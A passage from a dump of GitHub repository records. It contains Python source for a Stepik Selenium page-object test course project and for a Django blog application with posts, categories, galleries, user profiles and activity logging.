0.2 \n self._noise = 5\n Tester.__init__(self)\n \n def _generate_matrix(self):\n size = self._size\n TH = low_rank(size, self._rank) + sp.rand(size, size)/50*self._noise\n GA = spiky(size)\n Mask = selection(size, self._holes)\n Y = (TH + GA) * Mask\n self._Y, self._TH, self._GA, self._Mask = Y, TH, GA, Mask\n \n def no_noise_test(self):\n pass\n \n def default_test(self):\n pass\n\nt = SintheticMatrixTester()\nt.comparative_test()"
}
] | 7 |
alexalevtmp/stepik575FinalProject | https://github.com/alexalevtmp/stepik575FinalProject | b6c00d1b89d933d23f7822fd8f5533b919c9fbfa | e7a593b8dcfb11dc3a914cc9a4f17b7032c9bf38 | 5297df4b7efa8896d5cb3cd5839006af7f9a5f21 | refs/heads/master | 2022-12-24T05:19:06.998205 | 2019-08-02T05:21:01 | 2019-08-02T05:21:01 | 199,535,383 | 0 | 0 | null | 2019-07-29T22:35:39 | 2019-08-02T05:21:23 | 2022-12-08T05:56:54 | Python | [
{
"alpha_fraction": 0.662911593914032,
"alphanum_fraction": 0.664644718170166,
"avg_line_length": 40.74074172973633,
"blob_id": "935cb695c04bb71dfa10496394b5fff2966a1a4c",
"content_id": "6ba353dd4932982908d507351b4b6626969c39d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1276,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 27,
"path": "/pages/login_page.py",
"repo_name": "alexalevtmp/stepik575FinalProject",
"src_encoding": "UTF-8",
"text": "from .base_page import BasePage\r\nfrom .locators import LoginPageLocators\r\n\r\n\r\nclass LoginPage(BasePage):\r\n def should_be_login_page(self):\r\n self.should_be_login_url()\r\n self.should_be_login_form()\r\n self.should_be_register_form()\r\n\r\n def should_be_login_url(self):\r\n # реализуйте проверку на корректный url адрес\r\n # assert self.url.find(\"/login/\") != -1, \"Login url is not presented\"\r\n # assert self.is_element_present(*LoginPageLocators.LOGIN_LINK), \"Login link is not presented\"\r\n assert self.browser.current_url.find(\"login\") != -1, \"Login url is not presented\"\r\n # current_url\r\n # Gets the URL of the current page.\r\n # Usage:\tdriver.current_url\r\n\r\n def should_be_login_form(self):\r\n # реализуйте проверку, что есть форма логина\r\n assert self.is_element_present(*LoginPageLocators.LOGIN_FORM), \"Login form is not presented\"\r\n\r\n\r\n def should_be_register_form(self):\r\n # реализуйте проверку, что есть форма регистрации на странице\r\n assert self.is_element_present(*LoginPageLocators.REGISTER_FORM), \"Registration form is not presented\"\r\n"
},
{
"alpha_fraction": 0.6715328693389893,
"alphanum_fraction": 0.8029196858406067,
"avg_line_length": 21.83333396911621,
"blob_id": "8301b4cdbaea8440d7287861eef9e4fe025f0826",
"content_id": "7ba71bdbcb75ac14f26edad0255b7bfec1b4c4a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 164,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 6,
"path": "/README.md",
"repo_name": "alexalevtmp/stepik575FinalProject",
"src_encoding": "UTF-8",
"text": "# stepik575FinalProject\n\ncreated on:\nhttps://stepik.org/lesson/199980/step/6?unit=174035\n4.1 Что такое Page Object?\nПодготовка окружения\n"
},
{
"alpha_fraction": 0.5578168630599976,
"alphanum_fraction": 0.5821769833564758,
"avg_line_length": 42.2400016784668,
"blob_id": "0a986487e73c86152c38c5ea43d3752d092755a3",
"content_id": "28bff641e3fe6fe5f3c47b90e300261e53f68885",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3537,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 75,
"path": "/test_main_page.py",
"repo_name": "alexalevtmp/stepik575FinalProject",
"src_encoding": "UTF-8",
"text": "from .pages.main_page import MainPage\nfrom .pages.login_page import LoginPage\n\n# link for 4.3-2\n# link = \"http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209?promo=midsummer\"\n\n# link for 4.3-3\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=newYear2019\"\n\n# link = \"http://selenium1py.pythonanywhere.com/\"\n\n# link_login = \"http://selenium1py.pythonanywhere.com/en-gb/accounts/login/\"\n\n\n# def test_guest_can_go_to_login_page(browser):\n# page = MainPage(browser, link) # инициализируем Page Object, передаем в конструктор экземпляр драйвера и url адрес \n# page.open() # открываем страницу\n# page.go_to_login_page() # выполняем метод страницы - переходим на страницу логина\n\n# def test_guest_should_see_login_link(browser):\n# page = MainPage(browser, link)\n# page.open()\n# page.should_be_login_link()\n\n\n\n# # Второй подход: переход происходит неявно, страницу инициализируем в теле теста: \n# # 1. Закомментируйте строку с возвращаемым значением \n\ndef go_to_login_page(self):\n link = self.browser.find_element(*MainPageLocators.LOGIN_LINK)\n link.click()\n # return LoginPage(browser=self.browser, url=self.browser.current_url) \n\n# # 2. Инициализируем LoginPage в теле теста (не забудьте импортировать в файл нужный класс): \n\n# # from .pages.login_page import LoginPage\n\ndef test_guest_can_go_to_login_page(browser):\n link = \"http://selenium1py.pythonanywhere.com\"\n page = MainPage(browser, link)\n page.open()\n page.go_to_login_page()\n login_page = LoginPage(browser, browser.current_url)\n login_page.should_be_login_page()\n\n\n\n## from prev step!\n# def test_should_be_login_page(browser):\n# page = LoginPage(browser, link_login)\n# page.open()\n# page.should_be_login_page()\n\n\n# \"http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209?promo=midsummer\"\n\n# \"http://selenium1py.pythonanywhere.com/\"\n# \"http://selenium1py.pythonanywhere.com/en-gb/accounts/login/\"\n\n\n# Wed Jul 31 20:36:11 UTC 2019\n# (selenium_env) bash-3.2$ pytest -v --tb=line --language=en test_main_page.py\n# ============================================================ test session starts =============================================================\n# platform darwin -- Python 3.7.3, pytest-3.10.1, py-1.8.0, pluggy-0.12.0 -- /anaconda3/envs/selenium_env/bin/python\n# cachedir: .pytest_cache\n# rootdir: /Users/asl/stepik575/stepik575FinalProject, inifile:\n# plugins: rerunfailures-3.1\n# collected 3 items \n\n# test_main_page.py::test_guest_can_go_to_login_page PASSED [ 33%]\n# test_main_page.py::test_guest_should_see_login_link PASSED [ 66%]\n# test_main_page.py::test_should_be_login_page PASSED [100%]\n\n# ========================================================= 3 passed in 12.95 seconds ==========================================================\n"
},
{
"alpha_fraction": 0.6903870105743408,
"alphanum_fraction": 0.6953807473182678,
"avg_line_length": 37.19047546386719,
"blob_id": "1aef58b07490f2d6a951da55c419730037a34884",
"content_id": "3449122f9748815790123c49c8a14ad915dd7f36",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 922,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 21,
"path": "/test_product_page.py",
"repo_name": "alexalevtmp/stepik575FinalProject",
"src_encoding": "UTF-8",
"text": "from .pages.product_page import ProductPage\nfrom .pages.locators import ProductPageLocators # ADD_TO_CART\n\n# locators.py\n# class ProductPageLocators(object):\n# ADD_TO_CART = (By.CSS_SELECTOR, \"btn-add-to-basket\")\n\n\n# def test_guest_can_go_to_login_page(browser):\n# page = MainPage(browser, link) # инициализируем Page Object, передаем в конструктор экземпляр драйвера и url адрес \n# page.open() # открываем страницу\n# page.go_to_login_page() # выполняем метод страницы - переходим на страницу логина\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209/?promo=newYear\"\n\ndef test_guest_can_add_product_to_cart(browser):\n page = ProductPage(browser, link)\n page.open()\n page.add_to_cart()\n \n # add_to_cart()"
},
{
"alpha_fraction": 0.6693455576896667,
"alphanum_fraction": 0.6693455576896667,
"avg_line_length": 31.22222137451172,
"blob_id": "7177488f5b145e7a6d3d6cabed245bc0c9c9192d",
"content_id": "a7983c1a39f4799b0164a21496b258e1ef3d3835",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 871,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 27,
"path": "/pages/product_page.py",
"repo_name": "alexalevtmp/stepik575FinalProject",
"src_encoding": "UTF-8",
"text": "from .base_page import BasePage\nfrom .locators import ProductPageLocators\n# from .locators import MainPageLocators\n\n\nclass ProductPage(BasePage):\n\n def add_to_cart(self):\n login_link = self.browser.find_element(*ProductPageLocators.ADD_TO_CART)\n login_link.click()\n self.solve_quiz_and_get_code() \n # pass\n\n def guest_can_add_product_to_cart(self):\n pass\n\n\n# class MainPage(BasePage):\n# def go_to_login_page(self):\n# login_link = self.browser.find_element(*MainPageLocators.LOGIN_LINK)\n# login_link.click()\n\n# # def should_be_login_link(self):\n# # assert self.is_element_present(By.CSS_SELECTOR, \"#registration_link\"), \"Login link is not presented\"\n\n# def should_be_login_link(self):\n# assert self.is_element_present(*MainPageLocators.LOGIN_LINK), \"Login link is not presented\"\n\n"
}
] | 5 |
IsmaelB83/DjangoWeb | https://github.com/IsmaelB83/DjangoWeb | 3976996b86f16287f44befabc7b535eab3f6142f | 42160e6d0ac3dee2559ea3470319b377c40b24bd | 48b4c46ec12cd044191dec43aca9c9bf4971e57b | refs/heads/master | 2021-05-07T05:21:53.135576 | 2019-11-02T06:56:06 | 2019-11-02T06:56:06 | 111,456,962 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6445121765136719,
"alphanum_fraction": 0.6463414430618286,
"avg_line_length": 27.275861740112305,
"blob_id": "6ebf55708d561525900cf762d6c132bc70bf4286",
"content_id": "8bda5eb30d35852820f269f7814ba117dbefaa8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3280,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 116,
"path": "/post/admin.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.contrib import admin\n# Third party app imports\n# Local app imports\nfrom .models import Post, PostCategory, PostImage, PostImageSmall, PostComment, PostArchive, PostView, PostLike\n\n\n# More info here: https://docs.djangoproject.com/en/1.11/intro/tutorial07/\nclass PostModelAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"title\", \"content\", \"published_date\", \"updated\", \"timestamp\"]\n list_display_links = [\"title\"]\n list_editable = [\"content\"]\n list_filter = [\"published_date\", \"updated\", \"timestamp\"]\n search_fields = [\"published_date\", \"title\", \"content\"]\n\n class Meta:\n model = Post\n\n\nclass PostCategoryModelAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"post\", \"category\"]\n list_display_links = [\"id\"]\n list_editable = [\"post\", \"category\"]\n list_filter = [\"post\", \"category\"]\n search_fields = [\"post\", \"category\"]\n\n class Meta:\n model = PostCategory\n\n\nclass PostImageModelAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"post\", \"image\"]\n list_display_links = [\"id\"]\n list_editable = [\"post\", \"image\"]\n list_filter = [\"post\"]\n search_fields = [\"post\"]\n\n class Meta:\n model = PostImage\n\n\nclass PostImageSmallModelAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"post\", \"image\"]\n list_display_links = [\"id\"]\n list_editable = [\"post\", \"image\"]\n list_filter = [\"post\"]\n search_fields = [\"post\"]\n \n class Meta:\n model = PostImageSmall\n\n\nclass PostCommentAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"post\", \"comment\"]\n list_display_links = [\"id\"]\n list_editable = [\"post\", \"comment\"]\n list_filter = [\"post\"]\n search_fields = [\"post\"]\n\n class Meta:\n model = PostComment\n\n\nclass PostArchiveAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"year\", \"month\", \"posts\"]\n list_display_links = [\"id\"]\n list_editable = [\"posts\"]\n list_filter = [\"year\", \"month\"]\n search_fields = [\"year\", \"month\"]\n\n class Meta:\n model = PostArchive\n\n\nclass PostViewAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"post\", \"ip\"]\n list_display_links = [\"id\"]\n list_editable = [\"post\", \"ip\"]\n list_filter = [\"post\", \"date\"]\n search_fields = [\"post\", \"date\", \"ip\"]\n\n class Meta:\n model = PostView\n\n\nclass PostLikeAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"post\", \"date\", \"user\"]\n list_display_links = [\"id\"]\n list_editable = [\"post\", \"user\"]\n list_filter = [\"post\", \"date\"]\n search_fields = [\"post\", \"date\", \"user\"]\n\n class Meta:\n model = PostLike\n\n\nadmin.site.register(Post, PostModelAdmin)\nadmin.site.register(PostCategory, PostCategoryModelAdmin)\nadmin.site.register(PostImage, PostImageModelAdmin)\nadmin.site.register(PostImageSmall, PostImageSmallModelAdmin)\nadmin.site.register(PostComment, PostCommentAdmin)\nadmin.site.register(PostArchive, PostArchiveAdmin)\nadmin.site.register(PostView, PostViewAdmin)\nadmin.site.register(PostLike, PostLikeAdmin)\n\n\n# Admin is very good to model the application because it\n# easily allow us to test the CRUD concept:#\n# CRUD: Create* -- POST\n# Retrieve -- GET (Examples: List / Search)\n# Update* -- PUT/PATCH\n# Delete* -- DELETE\n#\n# * They will require permnissons\n"
},
{
"alpha_fraction": 0.6990358233451843,
"alphanum_fraction": 0.702479362487793,
"avg_line_length": 32.76744079589844,
"blob_id": "b68d5cca5e524b2df8e84ef71d9042b3bf0e53e1",
"content_id": "747cfd9efc6cbfb377d87418f4ff0c5ee746d038",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1452,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 43,
"path": "/post/forms.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django import forms\nfrom django.apps import apps\n# Third party app imports\nfrom multiupload.fields import MultiFileField\n# Local app imports\nfrom .models import Post, PostComment\n\n\nCATEGORY_CHOICES = [[c.id, c.name] for c in apps.get_model('category', 'Category').objects.all()]\n\n\nclass PostForm(forms.ModelForm):\n postcategory = forms.MultipleChoiceField(\n choices=CATEGORY_CHOICES,\n required=True,\n widget=forms.CheckboxSelectMultiple\n )\n status = forms.ChoiceField(choices=Post.STATUSES, required=True, widget=forms.RadioSelect)\n image_file = forms.FileField()\n postimage = MultiFileField(min_num=1)\n postimagesmall = MultiFileField(min_num=1, required=False)\n \n class Meta:\n model = Post\n fields = ('title', 'postcategory', 'status', 'published_date', 'image_file', 'content', 'postimage', 'postimagesmall')\n\n\nclass PostFormEdit(forms.ModelForm):\n postcategory = forms.MultipleChoiceField(\n choices=CATEGORY_CHOICES,\n required=True,\n widget=forms.CheckboxSelectMultiple\n )\n image_file = forms.FileField(required=False)\n postimage = MultiFileField(min_num=1, required=False)\n postimagesmall = MultiFileField(min_num=1, required=False)\n\n class Meta:\n model = Post\n fields = ('title', 'postcategory', 'status', 'published_date', 'image_file', 'content', 'postimage', 'postimagesmall')\n"
},
{
"alpha_fraction": 0.6392037868499756,
"alphanum_fraction": 0.641415536403656,
"avg_line_length": 41.05813980102539,
"blob_id": "79a12edc84ab4bb67ac5635d02516ba316b01931",
"content_id": "19a76a80aa0a2dd2354e7ce1b99452e06578f4a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3617,
"license_type": "no_license",
"max_line_length": 196,
"num_lines": 86,
"path": "/user/models.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.core.files import File\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\n# Third party app imports\n# Local app imports\nfrom history.models import LogUser, Activity\n\n\ndef upload_location_author(instance, filename):\n return 'profiles/%s/%s' % (instance.user, filename)\n\n\n# Create your models here.\nclass UserProfile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True)\n country = models.CharField(max_length=20, blank=True, null=False)\n location = models.CharField(max_length=30, blank=True, null=False)\n description = models.CharField(max_length=100, blank=True, null=False)\n introduction = models.TextField(blank=True, null=False)\n image = models.ImageField(\n upload_to=upload_location_author,\n null=False,\n blank=False)\n author = models.BooleanField(null=False, blank=False, default=False)\n\n @receiver(post_save, sender=User)\n def create_user_profile(sender, instance, created, **kwargs):\n if created:\n UserProfile.objects.create(user=instance)\n\n @receiver(post_save, sender=User)\n def save_user_profile(sender, instance, **kwargs):\n if instance.social_auth and not instance.userprofile.image:\n # r = requests.get(staticfiles_storage.url('img/user_social.gif'))\n # with open('/tmp/user_social.gif', 'wb') as f:\n # f.write(r.content)\n # reopen = open('/tmp/user_social.gif', 'rb')\n # django_file = File(reopen)\n # instance.userprofile.image.save('user_social.gif', django_file, save=True)\n reopen = open('/home/trama/static_cdn/img/user_social.gif', 'rb')\n django_file = File(reopen)\n instance.userprofile.image.save('user_social.gif', django_file, save=True)\n instance.userprofile.save()\n\n def add_log(self, visited_user, operation):\n if self.user != visited_user.user:\n log = LogUser()\n if operation == \"edit\":\n log.user = self.user\n log.activity = Activity.objects.get(activity=\"user_edit\")\n log.description = \"Ha editado el usuario <a href='\" + self.get_absolute_url() + \"'>\" + self.user.first_name + \" \" + self.user.last_name + \"</a>\"\n if operation == \"view\":\n log.user = self.user\n log.activity = Activity.objects.get(activity=\"user_visit\")\n log.description = \"Ha visitado el perfil del usuario <a href='\" + visited_user.get_absolute_url() + \"'>\" + visited_user.user.first_name + \" \" + visited_user.user.last_name + \"</a>\"\n log.pre_save()\n \n def __unicode__(self):\n return self.user.first_name + \" \" + self.user.last_name\n \n def __str__(self):\n return self.user.first_name + \" \" + self.user.last_name\n \n def get_absolute_url(self):\n return reverse('user:profile', kwargs={'id': self.user.id})\n\n\n# Create your models here.\nclass UserFollow(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='user')\n follows = models.ForeignKey(User, on_delete=models.CASCADE, related_name='follows')\n\n class Meta:\n unique_together = (('user', 'follows'),)\n\n def __unicode__(self):\n return self.user.username + \" \" + self.follow_user.username\n\n def __str__(self):\n return self.user.username + \" \" + self.follow_user.username\n"
},
{
"alpha_fraction": 0.6512141227722168,
"alphanum_fraction": 0.6556291580200195,
"avg_line_length": 32.974998474121094,
"blob_id": "6095ae46f0b3cc8ec4fed8485e760695a7ffc43f",
"content_id": "0de51d84df13c7f656ed8aca597284905a0831fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1360,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 40,
"path": "/category/models.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.db import models\nfrom django.core.urlresolvers import reverse\n# Third party app imports\n# Local app imports\nfrom history.models import LogUser, Activity\n\n\nclass Category(models.Model):\n id = models.CharField(primary_key=True, max_length=5)\n sort = models.IntegerField(null=False, blank=False)\n name = models.CharField(null=False, blank=False, max_length=20)\n css_class = models.CharField(null=False, blank=False, max_length=20)\n timestamp = models.DateTimeField(auto_now=False, auto_now_add=True)\n updated = models.DateTimeField(auto_now=True, auto_now_add=False)\n\n def __unicode__(self):\n return self.name\n\n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse('blog:category', kwargs={'id': self.id})\n\n def __iter__(self):\n return [self.id, self.sort, self.name, self.css_class, self.timestamp, self.updated]\n\n def add_log(self, user, operation):\n log = LogUser()\n if operation == \"view\":\n log.user = user\n log.activity = Activity.objects.get(activity=\"category_visit\")\n log.description = u\"Ha visitado la categoría de posts <a href='\" + self.get_absolute_url() + \"'>\" + self.name + \"</a>\"\n log.pre_save()\n\n class Meta:\n ordering = ['sort']\n"
},
{
"alpha_fraction": 0.6907514333724976,
"alphanum_fraction": 0.6965317726135254,
"avg_line_length": 27.72222137451172,
"blob_id": "0ae132967b43ffc794a8dbef525a28d8707aa76e",
"content_id": "ca83c39d12d96a9f1fa6fcf554de52a108c83b7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1039,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 36,
"path": "/gallery/models.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": " # coding=utf-8\n# Python imports\n# Django imports\nfrom django.db import models\n# Third party app imports\n# Local app imports\nfrom history.models import LogUser, Activity\nfrom post.models import Post\n\n\ndef upload_location_postimage(instance, filename):\n return 'post/' + instance.post_slug + '/' + filename\n\n\ndef add_log(user):\n log = LogUser()\n log.user = user\n log.activity = Activity.objects.get(activity=\"gallery_visit\")\n log.description = u\"Ha visitado la galería de imagenes\"\n log.pre_save()\n\n\n# Create your models here.\nclass Image(models.Model):\n caption = models.CharField(null=False, blank=True, max_length=50, default=\"No caption\")\n timestamp = models.DateTimeField(auto_now=False, auto_now_add=True)\n post_slug = models.SlugField(max_length=120)\n show_gallery = models.BooleanField(null=False, blank=False, default=False)\n image = models.ImageField(\n upload_to=upload_location_postimage,\n null=True,\n blank=True\n )\n\n def __str__(self):\n return self.caption\n"
},
{
"alpha_fraction": 0.6682692170143127,
"alphanum_fraction": 0.6694711446762085,
"avg_line_length": 24.24242401123047,
"blob_id": "f9f811096f9a1e6d4fab335c547b1fc82afc9cfd",
"content_id": "6728be8b8b94a3f545a37d9d587c55c149acd340",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 832,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 33,
"path": "/history/admin.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.contrib import admin\n# Third party app imports\n# Local app imports\nfrom .models import Activity, LogUser\n\n\nclass ActivityAdmin(admin.ModelAdmin):\n list_display = [\"activity\", \"icon\"]\n list_display_links = [\"activity\"]\n list_editable = [\"icon\"]\n list_filter = [\"activity\"]\n search_fields = [\"activity\"]\n\n class Meta:\n model = Activity\n\n\nclass LogUserAdmin(admin.ModelAdmin):\n list_display = [\"id\", \"activity\", \"user\", \"description\", \"timestamp\"]\n list_display_links = [\"id\"]\n list_editable = [\"activity\", \"user\", \"description\"]\n list_filter = [\"activity\", \"user\"]\n search_fields = [\"activity\", \"user\"]\n\n class Meta:\n model = LogUser\n\n\nadmin.site.register(Activity, ActivityAdmin)\nadmin.site.register(LogUser, LogUserAdmin)"
},
{
"alpha_fraction": 0.6409550309181213,
"alphanum_fraction": 0.6433424949645996,
"avg_line_length": 35.797298431396484,
"blob_id": "809ee7fe7c4404ff44714554da5ac7abc9d347e0",
"content_id": "559dcf5f45cac1e2968b025b6a4f13303454874f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5445,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 148,
"path": "/post/models.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.db import models\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\n# Third party app imports\n# Local app imports\nfrom history.models import LogUser, Activity\n\n\ndef add_log_search(user, search):\n log = LogUser()\n log.user = user\n log.activity = Activity.objects.get(activity=\"search\")\n log.description = \"Se ha realizado la siguiente busqueda: \" + search\n log.pre_save()\n\n\ndef add_log_archive(user, archive):\n log = LogUser()\n log.user = user\n log.activity = Activity.objects.get(activity=\"archive\")\n log.description = \"Se ha accedido al archivo: \" + archive\n log.pre_save()\n\n\nclass Post(models.Model):\n STATUSES = (('IN', 'Inactive'), ('DR', 'Draft'), ('PB', 'Published'),)\n\n id = models.SlugField(primary_key=True, max_length=120)\n title = models.CharField(null=False, blank=False, max_length=120, default='none')\n summary = models.TextField(null=False, blank=False, default='none', max_length=300)\n content = models.TextField(null=False, blank=False, default='none')\n author = models.ForeignKey('user.UserProfile', null=True, on_delete=models.SET_NULL)\n status = models.CharField(max_length=2, choices=STATUSES, default='DR')\n published_date = models.DateTimeField(null=False, blank=False)\n timestamp = models.DateTimeField(auto_now=False, auto_now_add=True)\n updated = models.DateTimeField(auto_now=True, auto_now_add=False)\n image = models.ForeignKey('gallery.Image', null=True, on_delete=models.SET_NULL)\n\n def add_log(self, user, operation):\n log = LogUser()\n log.user = user\n if operation == \"create\":\n log.activity = Activity.objects.get(activity=\"post_create\")\n log.description = u\"Ha creado el post <a href='\" + self.get_absolute_url() + \"'>\" + self.title + \"</a>\"\n elif operation == \"edit\":\n log.activity = Activity.objects.get(activity=\"post_edit\")\n log.description = u\"Ha editado el post <a href='\" + self.get_absolute_url() + \"'>\" + self.title + \"</a>\"\n elif operation == \"view\":\n log.activity = Activity.objects.get(activity=\"post_visit\")\n log.description = u\"Ha visitado el post <a href='\" + self.get_absolute_url() + \"'>\" + self.title + \"</a>\"\n log.pre_save()\n\n def __unicode__(self):\n return self.title\n\n def __str__(self):\n return self.title\n\n def get_absolute_url(self):\n return reverse('blog:post', kwargs={'id': self.id})\n\n class Meta:\n ordering = ['-timestamp', '-updated']\n\n\nclass PostImage(models.Model):\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n image = models.ForeignKey('gallery.Image', on_delete=models.CASCADE)\n\n def __str__(self):\n return self.post.title + \": \" + self.post.image.caption\n\n\nclass PostImageSmall(models.Model):\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n image = models.ForeignKey('gallery.Image', on_delete=models.CASCADE)\n \n def __str__(self):\n return self.post.title + \": \" + self.post.image.caption\n\n\nclass PostCategory(models.Model):\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n category = models.ForeignKey('category.Category', on_delete=models.CASCADE)\n\n def __str__(self):\n return self.post.title + \": \" + self.category.id\n\n\nclass PostComment(models.Model):\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n comment = models.ForeignKey('discuss.Comment', on_delete=models.CASCADE)\n\n class Meta:\n ordering = ['-post', '-comment__timestamp']\n\n def add_log(self, operation):\n log = LogUser()\n log.user = self.comment.user\n if operation == \"create\":\n log.activity = Activity.objects.get(activity=\"comment_post_create\")\n log.description = \"Ha creado el comentario <a href='\" + self.post.get_absolute_url() + \"#form_comments'>\" + self.comment.content[:15] + \"...</a>\"\n log.pre_save()\n\n def __str__(self):\n return self.post.title + \": \" + self.comment.content\n\n\nclass PostArchive(models.Model):\n year = models.PositiveIntegerField()\n month = models.PositiveIntegerField()\n posts = models.PositiveIntegerField()\n\n class Meta:\n unique_together = (('year', 'month'),)\n ordering = ['-year']\n\n\nclass PostView(models.Model):\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n date = models.DateTimeField(auto_now=False, auto_now_add=True)\n ip = models.GenericIPAddressField(null=False, blank=False)\n\n class Meta:\n ordering = ['-date']\n\n\nclass PostLike(models.Model):\n post = models.ForeignKey('Post', on_delete=models.CASCADE)\n user = models.ForeignKey(User, null=False, blank=False, on_delete=models.CASCADE)\n date = models.DateTimeField(auto_now=False, auto_now_add=True)\n\n def add_log(self, estado):\n log = LogUser()\n log.activity = Activity.objects.get(activity=\"post_like\")\n log.user = self.user\n if estado:\n log.description = \"Le gusta el post <a href='\" + self.post.get_absolute_url() + \"'>\" + self.post.title + \"</a>\"\n else:\n log.description = \"Ha dejado de gustarle el post <a href='\" + self.post.get_absolute_url() + \"'>\" + self.post.title + \"</a>\"\n log.pre_save()\n\n class Meta:\n unique_together = (('post', 'user'),)\n ordering = ['-date']"
},
{
"alpha_fraction": 0.7058823704719543,
"alphanum_fraction": 0.7277969717979431,
"avg_line_length": 31.11111068725586,
"blob_id": "581d1b77e1c2d1e52ef1c11a99896f2483d1a9a9",
"content_id": "4aa121657a4ba198d0fa6f1b265872af53473e16",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 867,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 27,
"path": "/web/urls.py",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n# Python imports\n# Django imports\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.conf.urls import handler404, handler500\n# Third party app imports\n# Local app imports\nfrom . import views\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^', include(\"post.urls\", namespace='blog')),\n url(r'^user/', include(\"user.urls\", namespace='user')),\n url(r'^accounts/', include('django.contrib.auth.urls')),\n url(r'^oauth/', include('social_django.urls', namespace='social')),\n]\n\nhandler404 = views.error_404\nhandler500 = views.error_500\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n"
},
{
"alpha_fraction": 0.5209712982177734,
"alphanum_fraction": 0.7086092829704285,
"avg_line_length": 17.875,
"blob_id": "8b6c2ea9b494246b3a9afc520f12dfcf720437cd",
"content_id": "202660f7daee98070b35cb1030ef27dabd668680",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 453,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 24,
"path": "/requirements.txt",
"repo_name": "IsmaelB83/DjangoWeb",
"src_encoding": "UTF-8",
